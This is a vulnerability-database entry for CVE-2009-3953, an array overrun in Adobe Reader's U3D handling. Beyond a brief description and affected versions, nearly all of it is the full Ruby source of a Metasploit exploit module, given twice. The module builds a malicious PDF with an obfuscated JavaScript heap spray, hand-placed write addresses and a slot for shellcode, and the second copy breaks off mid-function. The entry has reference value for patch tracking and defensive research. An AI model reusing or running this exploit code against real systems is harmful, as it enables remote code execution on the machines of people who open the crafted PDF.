ID CVE-2009-3953 Type cve Reporter cve@mitre.org Modified 2018-10-30T16:25:00
Description
The U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows and Mac OS X, and 7.x before 7.1.4 allows remote attackers to execute arbitrary code via malformed U3D data in a PDF document, related to a CLODProgressiveMeshDeclaration "array boundary issue," a different vulnerability than CVE-2009-2994.
Per: http://www.adobe.com/support/security/bulletins/apsb10-02.html
Affected software versions:
Adobe Reader 9.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.2 and earlier versions for Windows and Macintosh
{"exploitdb": [{"lastseen": "2016-02-02T06:06:24", "description": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun. CVE-2009-3953. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3953"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16622", "href": "https://www.exploit-db.com/exploits/16622/", "sourceData": "##\r\n# $Id: adobe_u3d_meshdecl.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\t\tAffected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\r\n\t\t\t\t\tspecially crafted pdf that a contains malformed U3D data, an attacker may\r\n\t\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-3953' ],\r\n\t\t\t\t\t[ 'OSVDB', '61690' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops'\t => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - untested\r\n\t\t\t\t\t# reader 7.0.8 - untested\r\n\t\t\t\t\t# reader 7.0.9 - untested\r\n\t\t\t\t\t# reader 7.1.0 - untested\r\n\t\t\t\t\t# reader 7.1.1 - untested\r\n\t\t\t\t\t# reader 8.0.0 - untested\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - not working :-/\r\n\t\t\t\t\t# reader 8.1.4 - untested\r\n\t\t\t\t\t# reader 8.1.5 - untested\r\n\t\t\t\t\t# reader 8.1.6 - untested\r\n\t\t\t\t\t# reader 9.0.0 - untested\r\n\t\t\t\t\t# reader 9.1.0 - works\r\n\t\t\t\t\t[ 'Adobe Reader Windows Universal (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (6500/20),\r\n\t\t\t\t\t\t\t'DataAddr'\t=> 0x09011020,\r\n\t\t\t\t\t\t\t'WriteAddr'\t=> 0x7c49fb34,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 13 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\r\n\r\n\tdef exploit\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n=begin\r\n\r\nOriginal notes on heap technique used in this exploit:\r\n\r\n## PREPAREHOLES:\r\n## We will construct 6500*20 bytes long chunks starting like this\r\n## |0 |6 |8 |C |24 |size\r\n## |00000... |0100|20100190|0000... | ......pad...... |\r\n## \\ \\\r\n## \\ \\ -Pointer: to controlled data\r\n## \\ -Flag: must be 1\r\n## -Adobe will handle this ragged structure if the Flag is on.\r\n## -Adobe will get 'what to write where' from the memory pointed\r\n## by our supplied Pointer.\r\n##\r\n## then allocate a bunch of those ..\r\n## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | ..\r\n## |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX|\r\n##\r\n## and then free some of them...\r\n## .. | chunk | free | chunk | free | chunk | free | chunck | ..\r\n## |XXXXXXX| |XXXXXXX| |XXXXXXX| |XXXXXXXX|\r\n##\r\n## This way controlling when the next 6500*20 malloc will be\r\n## followed with. We freed more than one hole so it became tolerant\r\n## to some degree of malloc/free trace noise.\r\n## Note the 6500 is arbitrary it should be a fairly unused chunk size\r\n## not big enough to cause a different type of allocation.\r\n## Also as we don't need to reference it from anywhere we don't care\r\n## where this hole layout is placed in memory.\r\n\r\n## PREPAREMEMORY:\r\n## In the next technique we make a big-chunk of 0x10000 bytes\r\n## repeating a 0x1000 bytes long mini-chunk of controled data.\r\n## Big-chunks are always allocated aligned to 0x1000. And if we\r\n## allocate a fair amount of big-chuncks (XPSPx) we'll be confident\r\n## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000\r\n## will have our mini chunk\r\n##\r\n## A mini-chunk will have this look\r\n##\r\n## |0 |10 |54 |? |0xff0 |0x1000\r\n## |00000... | POINTERS | nops | shellcode | pad |\r\n##\r\n## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+\r\n## But we use 0x09011064.\r\n## POINTERS looks like this:\r\n## ...\r\n\r\n=end\r\n\r\n\t\t# prepare the hole\r\n\t\tdaddr = target['DataAddr']\r\n\t\thole_data = [0,0,1,daddr].pack('VvvV')\r\n\t\t#padding\r\n\t\thole_data << \"\\x00\" * 24\r\n\t\thole = Rex::Text.to_unescape(hole_data)\r\n\r\n\t\t# prepare ptrs\r\n\t\tptrs_data = [0].pack('V')\r\n\t\t#where to write\r\n\t\tptrs_data << [target['WriteAddr'] / 4].pack('V')\r\n\t\t#must be greater tan 5 and less than x for getting us where we want\r\n\t\tptrs_data << [6].pack('V')\r\n\t\t#what to write\r\n\t\tptrs_data << [(daddr+0x10)].pack('V')\r\n\t\t#autopointer for print magic(tm)\r\n\t\tptrs_data << [(daddr+0x14)].pack('V')\r\n\t\t#function pointers for print magic(tm)\r\n\t\t#pointing to our shellcode\r\n\t\tptrs_data << [(daddr+0x44)].pack('V') * 12\r\n\t\tptrs = Rex::Text.to_unescape(ptrs_data)\r\n\r\n\t\tjs_doc = <<-EOF\r\nfunction prepareHoles(slide_size)\r\n{\r\n\tvar size = 1000;\r\n\tvar xarr = new Array(size);\r\n\tvar hole = unescape(\"#{hole}\");\r\n\tvar pad = unescape(\"%u5858\");\r\n\twhile (pad.length <= slide_size/2 - hole.length)\r\n\t\tpad += pad;\r\n\tfor (loop1=0; loop1 < size; loop1+=1)\r\n\t{\r\n\t\tident = \"\"+loop1;\r\n\t\txarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length);\r\n\t}\r\n\tfor (loop2=0;loop2<100;loop2++)\r\n\t{\r\n\t\tfor (loop1=size/2; loop1 < size-2; loop1+=2)\r\n\t\t{\r\n\t\t\txarr[loop1]=null;\r\n\t\t\txarr[loop1]=pad.substring(0,0x10000/2 )+\"A\";\r\n\t\t\txarr[loop1]=null;\r\n\t\t}\r\n\t}\r\n\treturn xarr;\r\n}\r\n\r\nfunction prepareMemory(size)\r\n{\r\n\tvar mini_slide_size = 0x1000;\r\n\tvar slide_size = 0x100000;\r\n\tvar xarr = new Array(size);\r\n\tvar pad = unescape(\"%ucccc\");\r\n\r\n\twhile (pad.length <= 32 )\r\n\t\tpad += pad;\r\n\r\n\tvar nops = unescape(\"#{nops}\");\r\n\twhile (nops.length <= mini_slide_size/2 - nops.length)\r\n\t\tnops += nops;\r\n\r\n\tvar shellcode = unescape(\"#{shellcode}\");\r\n\tvar pointers = unescape(\"#{ptrs}\");\r\n\tvar chunk = nops.substring(0,32/2) + pointers +\r\n\t\tnops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) +\r\n\t\tshellcode + pad.substring(0,32/2);\r\n\tchunk=chunk.substring(0,mini_slide_size/2);\r\n\twhile (chunk.length <= slide_size/2)\r\n\t\tchunk += chunk;\r\n\r\n\tfor (loop1=0; loop1 < size; loop1+=1)\r\n\t{\r\n\t\tident = \"\"+loop1;\r\n\t\txarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident;\r\n\t}\r\n\treturn xarr;\r\n}\r\n\r\n\tvar mem = prepareMemory(200);\r\n\tvar holes = prepareHoles(6500);\r\n\tthis.pageNum = 1;\r\nEOF\r\n\t\tjs_pg1 = %Q|this.print({bUI:true, bSilent:false, bShrinkToFit:false});|\r\n\r\n\t\t# Obfuscate it up a bit\r\n\t\tjs_doc = obfuscate_js(js_doc,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => %W{ slide_size size hole pad mini_slide_size nops shellcode pointers chunk mem holes xarr loop1 loop2 ident },\r\n\t\t\t\t'Methods' => %W{ prepareMemory prepareHoles }\r\n\t\t\t}).to_s\r\n\r\n\t\t# create the u3d stuff\r\n\t\tu3d = make_u3d_stream(target['Size'], rand_text_alpha(rand(28)+4))\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(u3d, js_doc, js_pg1)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\r\n\tdef obfuscate_js(javascript, opts)\r\n\t\tjs = Rex::Exploitation::ObfuscateJS.new(javascript, opts)\r\n\t\tjs.obfuscate\r\n\t\treturn js\r\n\tend\r\n\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef u3d_pad(str, char=\"\\x00\")\r\n\t\tret = \"\"\r\n\t\tif (str.length % 4) > 0\r\n\t\t\tret << char * (4 - (str.length % 4))\r\n\t\tend\r\n\t\treturn ret\r\n\tend\r\n\r\n\r\n\tdef make_u3d_stream(size, meshname)\r\n\r\n\t\t# build the U3D header\r\n\t\thdr_data = [1,0].pack('n*') # version info\r\n\t\thdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV')\r\n\t\thdr = \"U3D\\x00\"\r\n\t\thdr << [hdr_data.length,0].pack('VV')\r\n\t\thdr << hdr_data\r\n\r\n\t\t# mesh declaration\r\n\t\tdecl_data = [meshname.length].pack('v')\r\n\t\tdecl_data << meshname\r\n\t\tdecl_data << [0].pack('V') # chain idx\r\n\t\t# max mesh desc\r\n\t\tdecl_data << [0].pack('V') # mesh attrs\r\n\t\tdecl_data << [1].pack('V') # face count\r\n\t\tdecl_data << [size].pack('V') # position count\r\n\t\tdecl_data << [4].pack('V') # normal count\r\n\t\tdecl_data << [0].pack('V') # diffuse color count\r\n\t\tdecl_data << [0].pack('V') # specular color count\r\n\t\tdecl_data << [0].pack('V') # texture coord count\r\n\t\tdecl_data << [1].pack('V') # shading count\r\n\t\t# shading desc\r\n\t\tdecl_data << [0].pack('V') # shading attr\r\n\t\tdecl_data << [0].pack('V') # texture layer count\r\n\t\tdecl_data << [0].pack('V') # texture coord dimensions\r\n\t\t# no textore coords (original shading ids)\r\n\t\tdecl_data << [size+2].pack('V') # minimum resolution\r\n\t\tdecl_data << [size+3].pack('V') # final maximum resolution (needs to be bigger than the minimum)\r\n\t\t# quality factors\r\n\t\tdecl_data << [0x12c].pack('V') # position quality factor\r\n\t\tdecl_data << [0x12c].pack('V') # normal quality factor\r\n\t\tdecl_data << [0x12c].pack('V') # texture coord quality factor\r\n\t\t# inverse quantiziation\r\n\t\tdecl_data << [0].pack('V') # position inverse quant\r\n\t\tdecl_data << [0].pack('V') # normal inverse quant\r\n\t\tdecl_data << [0].pack('V') # texture coord inverse quant\r\n\t\tdecl_data << [0].pack('V') # diffuse color inverse quant\r\n\t\tdecl_data << [0].pack('V') # specular color inverse quant\r\n\t\t# resource params\r\n\t\tdecl_data << [0].pack('V') # normal crease param\r\n\t\tdecl_data << [0].pack('V') # normal update param\r\n\t\tdecl_data << [0].pack('V') # normal tolerance param\r\n\t\t# skeleton description\r\n\t\tdecl_data << [0].pack('V') # bone count\r\n\t\t# padding\r\n\t\tdecl_pad = u3d_pad(decl_data)\r\n\t\tmesh_decl = [0xffffff31,decl_data.length,0].pack('VVV')\r\n\t\tmesh_decl << decl_data\r\n\t\tmesh_decl << decl_pad\r\n\r\n\t\t# build the modifier chain\r\n\t\tchain_data = [meshname.length].pack('v')\r\n\t\tchain_data << meshname\r\n\t\tchain_data << [1].pack('V') # type (model resource)\r\n\t\tchain_data << [0].pack('V') # attributes (no bounding info)\r\n\t\tchain_data << u3d_pad(chain_data)\r\n\t\tchain_data << [1].pack('V') # number of modifiers\r\n\t\tchain_data << mesh_decl\r\n\t\tmodifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')\r\n\t\tmodifier_chain << chain_data\r\n\r\n\t\t# mesh continuation\r\n\t\tcont_data = [meshname.length].pack('v')\r\n\t\tcont_data << meshname\r\n\t\tcont_data << [0].pack('V') # chain idx\r\n\t\tcont_data << [0].pack('V') # start resolution\r\n\t\tcont_data << [0].pack('V') # end resolution\r\n\t\t# no resolution update, unknown data follows\r\n\t\tcont_data << [0].pack('V')\r\n\t\tcont_data << [1].pack('V') * 10\r\n\t\tmesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')\r\n\t\tmesh_cont << cont_data\r\n\t\tmesh_cont << u3d_pad(cont_data)\r\n\r\n\t\tdata = hdr\r\n\t\tdata << modifier_chain\r\n\t\tdata << mesh_cont\r\n\r\n\t\t# patch the length\r\n\t\tdata[24,4] = [data.length].pack('V')\r\n\r\n\t\treturn data\r\n\r\n\tend\r\n\r\n\tdef make_pdf(u3d_stream, js_doc, js_pg1)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0a\"\r\n\t\tobj_end = \"\" << eol << \"endobj\" << eol\r\n\r\n\t\t# the header\r\n\t\tpdf = \"%PDF-1.7\" << eol\r\n\r\n\t\t# filename/comment\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# js stream (doc open action js)\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << obj_end\r\n\r\n\t\t# js stream 2 (page 1 annot js)\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << obj_end\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(4)\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(5)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(8) << nObfu(\">>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# outline\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Outlines/Count 0>>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# pages/kids\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Pages/Count 2/Kids [\")\r\n\t\tpdf << ioRef(10) << \" \" # empty page\r\n\t\tpdf << ioRef(11) # u3d page\r\n\t\tpdf << nObfu(\"]>>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# u3d stream\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Type/3D/Subtype/U3D/Length %s>>\" % u3d_stream.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << u3d_stream << eol\r\n\t\tpdf << \"endstream\"\r\n\t\tpdf << obj_end\r\n\r\n\t\t# u3d annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype\")\r\n\t\tpdf << \"/3D/3DA <</A/PO/DIS/I>>\"\r\n\t\tpdf << nObfu(\"/Rect [0 0 640 480]/3DD \") << ioRef(6) << nObfu(\"/F 7>>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# js dict (open action js)\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(1) + \">>\" << obj_end\r\n\r\n\t\t# js dict (page 1 annot js)\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(2) + \">>\" << obj_end\r\n\r\n\t\t# page 0 (empty)\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10) << nObfu(\"<</Type/Page/Parent \") << ioRef(5) << nObfu(\"/MediaBox [0 0 640 480]\")\r\n\t\tpdf << nObfu(\" >>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# page 1 (u3d/print)\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11) << nObfu(\"<</Type/Page/Parent \") << ioRef(5) << nObfu(\"/MediaBox [0 0 640 480]\")\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"]\")\r\n\t\tpdf << nObfu(\"/AA << /O \") << ioRef(9) << nObfu(\">>\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << obj_end\r\n\r\n\t\t# xrefs\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\t# trailer\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(3) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16622/"}], "metasploit": [{"lastseen": "2020-08-06T23:27:58", "description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.\n", "published": "2009-11-25T22:24:10", "type": "metasploit", "title": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3953"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_U3D_MESHDECL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',\n 'Description' => %q{\n This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-3953' ],\n [ 'OSVDB', '61690' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops'\t => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - untested\n # reader 7.0.8 - untested\n # reader 7.0.9 - untested\n # reader 7.1.0 - untested\n # reader 7.1.1 - untested\n # reader 8.0.0 - untested\n # reader 8.1.2 - works\n # reader 8.1.3 - not working :-/\n # reader 8.1.4 - untested\n # reader 8.1.5 - untested\n # reader 8.1.6 - untested\n # reader 9.0.0 - untested\n # reader 9.1.0 - works\n [ 'Adobe Reader Windows Universal (JS Heap Spray)',\n {\n 'Size'\t\t=> (6500/20),\n 'DataAddr'\t=> 0x09011020,\n 'WriteAddr'\t=> 0x7c49fb34,\n }\n ],\n ],\n 'DisclosureDate' => 'Oct 13 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n\n end\n\n\n\n def exploit\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n=begin\n\nOriginal notes on heap technique used in this exploit:\n\n## PREPAREHOLES:\n## We will construct 6500*20 bytes long chunks starting like this\n## |0 |6 |8 |C |24 |size\n## |00000... |0100|20100190|0000... | ......pad...... |\n## \\ \\\n## \\ \\ -Pointer: to controlled data\n## \\ -Flag: must be 1\n## -Adobe will handle this ragged structure if the Flag is on.\n## -Adobe will get 'what to write where' from the memory pointed\n## by our supplied Pointer.\n##\n## then allocate a bunch of those ..\n## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | ..\n## |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX|\n##\n## and then free some of them...\n## .. | chunk | free | chunk | free | chunk | free | chunck | ..\n## |XXXXXXX| |XXXXXXX| |XXXXXXX| |XXXXXXXX|\n##\n## This way controlling when the next 6500*20 malloc will be\n## followed with. We freed more than one hole so it became tolerant\n## to some degree of malloc/free trace noise.\n## Note the 6500 is arbitrary it should be a fairly unused chunk size\n## not big enough to cause a different type of allocation.\n## Also as we don't need to reference it from anywhere we don't care\n## where this hole layout is placed in memory.\n\n## PREPAREMEMORY:\n## In the next technique we make a big-chunk of 0x10000 bytes\n## repeating a 0x1000 bytes long mini-chunk of controled data.\n## Big-chunks are always allocated aligned to 0x1000. And if we\n## allocate a fair amount of big-chuncks (XPSPx) we'll be confident\n## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000\n## will have our mini chunk\n##\n## A mini-chunk will have this look\n##\n## |0 |10 |54 |? |0xff0 |0x1000\n## |00000... | POINTERS | nops | shellcode | pad |\n##\n## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+\n## But we use 0x09011064.\n## POINTERS looks like this:\n## ...\n\n=end\n\n # prepare the hole\n daddr = target['DataAddr']\n hole_data = [0,0,1,daddr].pack('VvvV')\n #padding\n hole_data << \"\\x00\" * 24\n hole = Rex::Text.to_unescape(hole_data)\n\n # prepare ptrs\n ptrs_data = [0].pack('V')\n #where to write\n ptrs_data << [target['WriteAddr'] / 4].pack('V')\n #must be greater tan 5 and less than x for getting us where we want\n ptrs_data << [6].pack('V')\n #what to write\n ptrs_data << [(daddr+0x10)].pack('V')\n #autopointer for print magic(tm)\n ptrs_data << [(daddr+0x14)].pack('V')\n #function pointers for print magic(tm)\n #pointing to our shellcode\n ptrs_data << [(daddr+0x44)].pack('V') * 12\n ptrs = Rex::Text.to_unescape(ptrs_data)\n\n js_doc = <<-EOF\nfunction prepareHoles(slide_size)\n{\n var size = 1000;\n var xarr = new Array(size);\n var hole = unescape(\"#{hole}\");\n var pad = unescape(\"%u5858\");\n while (pad.length <= slide_size/2 - hole.length)\n pad += pad;\n for (loop1=0; loop1 < size; loop1+=1)\n {\n ident = \"\"+loop1;\n xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length);\n }\n for (loop2=0;loop2<100;loop2++)\n {\n for (loop1=size/2; loop1 < size-2; loop1+=2)\n {\n xarr[loop1]=null;\n xarr[loop1]=pad.substring(0,0x10000/2 )+\"A\";\n xarr[loop1]=null;\n }\n }\n return xarr;\n}\n\nfunction prepareMemory(size)\n{\n var mini_slide_size = 0x1000;\n var slide_size = 0x100000;\n var xarr = new Array(size);\n var pad = unescape(\"%ucccc\");\n\n while (pad.length <= 32 )\n pad += pad;\n\n var nops = unescape(\"#{nops}\");\n while (nops.length <= mini_slide_size/2 - nops.length)\n nops += nops;\n\n var shellcode = unescape(\"#{shellcode}\");\n var pointers = unescape(\"#{ptrs}\");\n var chunk = nops.substring(0,32/2) + pointers +\n nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) +\n shellcode + pad.substring(0,32/2);\n chunk=chunk.substring(0,mini_slide_size/2);\n while (chunk.length <= slide_size/2)\n chunk += chunk;\n\n for (loop1=0; loop1 < size; loop1+=1)\n {\n ident = \"\"+loop1;\n xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident;\n }\n return xarr;\n}\n\n var mem = prepareMemory(200);\n var holes = prepareHoles(6500);\n this.pageNum = 1;\nEOF\n js_pg1 = %Q|this.print({bUI:true, bSilent:false, bShrinkToFit:false});|\n\n # Obfuscate it up a bit\n js_doc = obfuscate_js(js_doc,\n 'Symbols' => {\n 'Variables' => %W{ slide_size size hole pad mini_slide_size nops shellcode pointers chunk mem holes xarr loop1 loop2 ident },\n 'Methods' => %W{ prepareMemory prepareHoles }\n }).to_s\n\n # create the u3d stuff\n u3d = make_u3d_stream(target['Size'], rand_text_alpha(rand(28)+4))\n\n # Create the pdf\n pdf = make_pdf(u3d, js_doc, js_pg1)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n\n def obfuscate_js(javascript, opts)\n js = Rex::Exploitation::ObfuscateJS.new(javascript, opts)\n js.obfuscate\n return js\n end\n\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n def 